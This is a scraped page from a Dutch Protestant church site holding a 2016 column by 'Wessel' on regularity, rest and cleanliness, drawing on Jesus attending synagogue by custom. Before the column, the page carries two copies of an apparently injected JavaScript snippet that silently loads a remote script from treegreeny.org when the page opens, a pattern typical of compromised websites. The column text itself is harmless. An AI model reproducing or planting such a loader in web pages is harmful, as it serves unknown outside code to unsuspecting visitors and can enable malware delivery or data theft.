;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Regelmaat - PKN Damwâld

Regelmaat

Gepubliceerd op: vrijdag 14 oktober 2016

Wanneer u mannen vraagt naar de betekenis van de 3 R’s is de kans groot dat zij u antwoorden: ‘Geen idee wat je bedoelt, 2 R’s weet ik wel, dat slaat op de ‘keizer’ onder de auto ’s de Rolls-Royce’.

Wanneer u echter dezelfde vraagt stelt aan de (iets oudere ?) dames die werkzaam zijn, of zijn geweest in de gezondheidszorg zullen zij u onmiddellijk het antwoord geven: De 3 R’s staan voor Reinheid, Rust en Regelmaat.

Het lijkt wel of de laatste tijd deze 3 R’s wat in de verdrukking komen. En dan bedoel ik niet de ‘uiterlijke’ 3 R’s maar meer de innerlijke. Is er bij ons (nog) sprake van innerlijke reinheid, gunnen we onszelf nog voldoende innerlijke rust en is er nog sprake van positieve regelmaat.

Op dit laatste begrip wil ik even kort ingaan. Regelmaat wordt vaak gekoppeld aan ouderwets. Alles moet vernieuwd en/of uitdagend zijn. Bij regelmaat of ouderwets is er, denkt men, snel sprake van sleur en dat is het laatste wat we tegenwoordig willen. Wie de advertenties van welk bedrijf of instelling dan ook maar beziet weet dat steeds nieuwe mogelijkheden en vormen of wat dan ook maar voor nieuws de maat is. Met regelmaat het zelfde doen is uit.

In de Bijbel lezen wij dat Jezus ‘volgens zijn gewoonte’ op sabbath naar de synagoge ging. Dat valt op. Hij, de Koning van de kerk, heeft er kennelijk behoefte aan om samen met zijn geloofsgenoten samen te komen om te luisteren naar en te spreken over (het woord van) God. Opvallend dat Hij die de schriften beter kent dan wie ook er behoefte aan heeft met regelmaat met mensen samen te komen. Op deze wijze onderhoudt Hij kennelijk contact met de medemensen en met Zijn Hemelse Vader. Regelmaat is kennelijk zo slecht nog niet. Is er iets op tegen om Jezus’ voorbeeld te volgen ?

Columnist:Wessel

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns